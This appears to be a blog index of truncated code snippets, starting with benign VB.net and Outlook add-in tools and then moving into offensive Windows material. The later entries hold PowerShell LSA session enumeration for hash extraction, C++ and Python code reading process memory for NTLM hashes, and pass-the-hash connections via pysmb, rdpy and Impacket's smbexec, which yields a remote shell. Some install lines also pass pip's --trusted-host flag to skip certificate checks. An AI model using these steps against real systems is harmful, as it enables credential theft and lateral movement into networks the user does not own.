Detect and know when your workstation is locked with VB.net

Imports System.Timers Public Class WorkStationReader #Region “API Calls” Private Const DESKTOP_CREATEMENU As Int32 = &H4& Private Const DESKTOP_CREATEWINDOW As Int32 = &H2& Private Const DESKTOP_ENUMERATE As Int32 = &H40& Private Const DESKTOP_HOOKCONTROL As Int32 = &H8& Private Const DESKTOP_READOBJECTS As Int32 = &H1& Private Const DESKTOP_SWITCHDESKTOP As Int32 = &H100& Private Const DESKTOP_WRITEOBJECTS As Int32 = &H80& Private Const GENERIC_WRITE As Int32 = &H40000000 Private Const HWND_BROADCAST As Int32 = &HFFFF& Private Const WM_HOTKEY As Int32 = &H312 Private Const MOD_ALT As Int32 = &H1 Private Const MOD_CONTROL As Int32 = &H2 Private Const VK_DELETE As Int32 = &H2E Private …

Outlook Plugin to Track Jabber and Jira.

using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Xml.Linq; using Outlook = Microsoft.Office.Interop.Outlook; using Office = Microsoft.Office.Core; using System.Windows.Forms; using System.Runtime.InteropServices; using System.DirectoryServices.AccountManagement; using System.DirectoryServices; using System.Collections; using System.Xml; using System.Xml.XPath; using System.Net; using System.Diagnostics; using System.Text.RegularExpressions; namespace EmailManager { public partial class ThisAddIn { Timer MyTimer = new Timer(); private void ClearCalendarAudits() { try { Outlook.Folder calFolder = Application.Session.GetDefaultFolder(Outlook.OlDefaultFolders.olFolderCalendar) as Outlook.Folder; DateTime start = DateTime.Now.AddDays(-7); DateTime end = DateTime.Now; Outlook.Items rangeAppts = GetAppointmentsInRange(calFolder, start, end); if (rangeAppts != null) { foreach (Outlook.AppointmentItem appt in rangeAppts) { //Debug.WriteLine(DateTime.Now.ToString() + ” – ” +”Subject: ” + appt.Subject + ” Start: …

Extracting Street Data from GoogleMaps Street image

Public Class Form1 Dim Cycles As Integer = 0 Dim DictionaryListUsed As New Dictionary(Of Color, Integer) Dim DictionaryList As New Dictionary(Of Color, Integer) Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load Dim img As Bitmap = New Bitmap(“C:\Users\User\Desktop\GoogleMap.png”) Dim x, y As Integer Using G As Graphics = Me.CreateGraphics Dim BMP As New Bitmap(img.Width, img.Height) Dim BMP2 As New Bitmap(img.Width, img.Height) Dim pixel As Color = Nothing For x = 0 To img.Width – 1 For y = 0 To img.Height – 1 pixel = img.GetPixel(x, y) If (DictionaryList.ContainsKey(pixel)) Then DictionaryList(pixel) += 1 Else DictionaryList.Add(pixel, 1) End If …

Skyhook API with VB.net

Imports System.IO Imports System.Net Imports System.Text Public Class Form1 Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load SendHTTPSPost() End Sub Sub SendHTTPSPost() ‘ Create a request using a URL that can receive a post. Dim request As WebRequest = WebRequest.Create(“https://api.skyhookwireless.com/wps2/location”) ‘Dim request As WebRequest = WebRequest.Create(“https://global.skyhookwireless.com/wps2/location”) ‘ Set the Method property of the request to POST. request.Method = “POST” ‘ Create POST data and convert it to a byte array. Dim XML As String XML = “<LocationRQ xmlns=’https://skyhookwireless.com/wps/2005′ version=’2.6′ street-address-lookup=’full’>” XML &= “<authentication version=’2.0′>” If True Then XML &= “<key key=’PUTYOUR-KEYHERE’ username=’name’/>” Else XML &= “<simple>” XML &= …

Powershell and Extracting hashes

Remove-Variable * -ErrorAction SilentlyContinue; Remove-Module *; $error.Clear(); $MethodDefinition = @’ [DllImport(“Secur32.dll”, CharSet = CharSet.Unicode)] public static extern uint LsaEnumerateLogonSessions(out UInt64 LogonSessionCount, out IntPtr LogonSessionList); [DllImport(“Secur32.dll”, CharSet = CharSet.Unicode)] public static extern uint LsaGetLogonSessionData(IntPtr luid, out IntPtr ppLogonSessionData); ‘@ $Secur32 = Add-Type -MemberDefinition $MethodDefinition -Name ‘Secur32’ -Namespace ‘Secur32’ -PassThru add-type -PassThru -TypeDefinition @” using System; using System.Collections; using System.Collections.Generic; using System.Linq; using System.Runtime.InteropServices; using System.Security.Principal; using System.Text; namespace Ansible { [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct LSA_UNICODE_STRING { public UInt16 Length; public UInt16 MaximumLength; public IntPtr buffer; } [StructLayout(LayoutKind.Sequential)] public struct LUID { public UInt32 LowPart; public Int32 HighPart; } [StructLayout(LayoutKind.Sequential)] …

Pulling NTLM In Memory with C++

Work in progress // ReadBridge.cpp : Defines the entry point for the console application. // #include “stdafx.h” #define _WINSOCK_DEPRECATED_NO_WARNINGS #define _WINSOCK_DEPCRECATED #include “ReadBridge.h” #include “winternl.h” #ifdef _DEBUG #define new DEBUG_NEW #endif class CModuleSocket { public: CModuleSocket(void); ~CModuleSocket(void); UINT32 ConnectServer(IN const char* pIpAddr, OUT SOCKET* pSocket, OUT bool* pbSuccess); //Á¬½Ó·þÎñÆ÷ UINT32 SendCommand(IN const SOCKET socket, IN char* szBuf, IN int bytes, OUT bool* pbSuccess); //·¢ËÍÏûÏ¢ UINT32 RecvCommand(IN const SOCKET socket, OUT char* szBuf, OUT int bytes, OUT bool *pbSuccess); //½ÓÊÜÏûÏ¢ void Clean(); public: UINT m_nPort; //Á¬½Ó¶Ë¿Ú }; #pragma once #include <windows.h> //Êý¾Ý´«ÊäµÄ»º³åÇø´óС #define CONTEXT_BUF_SIZE (1024 * 4) //IPµØÖ·»º³åÇø´óС #define IPADDR_SIZE 32 …

Reading memory with Python

from ctypes import * from ctypes.wintypes import * import time import os, sys import win32security import tempfile import win32api, win32con from ntsecuritycon import TokenSessionId, TokenSandBoxInert, TokenType, TokenImpersonationLevel, TokenVirtualizationEnabled, TokenVirtualizationAllowed, TokenHasRestrictions, TokenElevationType, TokenUIAccess, TokenUser, TokenOwner, TokenGroups, TokenRestrictedSids, TokenPrivileges, TokenPrimaryGroup, TokenSource, TokenDefaultDacl, TokenStatistics, TokenOrigin, TokenLinkedToken, TokenLogonSid, TokenElevation, TokenIntegrityLevel, TokenMandatoryPolicy, SE_ASSIGNPRIMARYTOKEN_NAME, SE_BACKUP_NAME, SE_CREATE_PAGEFILE_NAME, SE_CREATE_TOKEN_NAME, SE_DEBUG_NAME, SE_LOAD_DRIVER_NAME, SE_MACHINE_ACCOUNT_NAME, SE_RESTORE_NAME, SE_SHUTDOWN_NAME, SE_TAKE_OWNERSHIP_NAME, SE_TCB_NAME OpenProcess = windll.kernel32.OpenProcess ReadProcessMemory = windll.kernel32.ReadProcessMemory CloseHandle = windll.kernel32.CloseHandle def get_extra_privs(): # Try to give ourselves some extra privs (only works if we’re admin): # SeBackupPrivilege – so we can read anything # SeDebugPrivilege – so we can find out about other …

Passing the Hash with Python SMB

git clone https://github.com/miketeo/pysmb.git python setup.py install Then drop this in test.py import sys import pprint from smb.SMBConnection import SMBConnection from util import getConnectionInfo conn = SMBConnection(“UserAccount”, “!31:70:ae:1e:3e:NT:LM:Hash:Goes:Here:a9:37:fc:e3”, “Your IP Here”, “RemoteHostname”, use_ntlm_v2 = True, is_direct_tcp = True) conn.connect(“RemoteHostName”, 445) #Use IS TCP Direct on 445 and 135 for the other results = conn.listShares() for smbtest in [r.name.lower() for r in results]: print(smbtest) # pretty print loaded modules #pprint.pprint(sys.modules) #filelist = conn.listPath(‘shared_folder_name’, ‘/’) Modify this code in Python\pysmb\python3\smb -> ntlm.py def generateChallengeResponseV2(password, user, server_challenge, server_info, domain = ”, client_challenge = None): client_timestamp = b’\0′ * 8 if not client_challenge: client_challenge = …

Installing Impacket

git https://github.com/SecureAuthCorp/impacket.git pip install --upgrade pip --trusted-host pypi.org --trusted-host files.pythonhosted.org . python smbclient.py https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/ python setup.py install Python\impacket\examples>python smbclient.py or Python\impacket\examples>smbclient.py smbexec.py Domain/Username:YourPassword@HostOfServer or \Python\impacket\examples>smbexec.py Domain/Username@ServerHostname -hashes E52CLMHASHGOESHERE168F41AFC3A96:3170221NTLMHASHGOESHERE937FCE3 Impacket v0.9.21-dev – Copyright 2019 SecureAuth Corporation [!] Launching semi-interactive shell – Careful what you execute C:\Windows\system32>set But you can really just use this “smbexec.py Domain/Username@ServerHostname -hashes :PUT YOUR NTLM HASH HERE LIKE SO” “smbexec.py Domain/Username@ServerHostname -hashes :3170221NTLMHASHGOESHERE937FCE3” https://tobtu.com/lmntlm.php <-- You may use this site to test the hash. Only use values derived from a throwaway test password on that site: as the -hashes option above shows, the NT hash alone is accepted in place of the password, so a real account's hash pasted into a third-party page is a disclosed credential. For the same reason, NTLM hashes left in command-line history, scripts or memory dumps need the same protection as plaintext passwords.

Python Code for Passing the Hash

Install PIP and run pip rdpy --trusted-host pypi.org --trusted-host files.pythonhosted.org pip install pyinstaller --trusted-host pypi.org --trusted-host files.pythonhosted.org pip install pywin32 --trusted-host pypi.org --trusted-host files.pythonhosted.org or git https://github.com/citronneur/rdpy.git python setup.py install for python 2.7 Then Install PyQt4 from here, note that this only works on 2.7 -> https://pypi.org/project/PyQt4/ You may also get the link from here, https://github.com/citronneur/rdpy (in the windows section) (This will not work and will error out, this is for 2.7 only) for python 3.8+ Run this instead pip install rdpy --trusted-host pypi.org --trusted-host files.pythonhosted.org (Note: --trusted-host makes pip accept these hosts without a valid HTTPS certificate, so the downloaded packages are not protected against tampering in transit; behind a TLS-inspecting proxy, giving pip the proxy's CA certificate with --cert keeps verification on.) Then C:\Python27\Lib\site-packages\rdpy\protocol\rdp\nla\ntlm.py Edit this file with the following below. then execute the following command …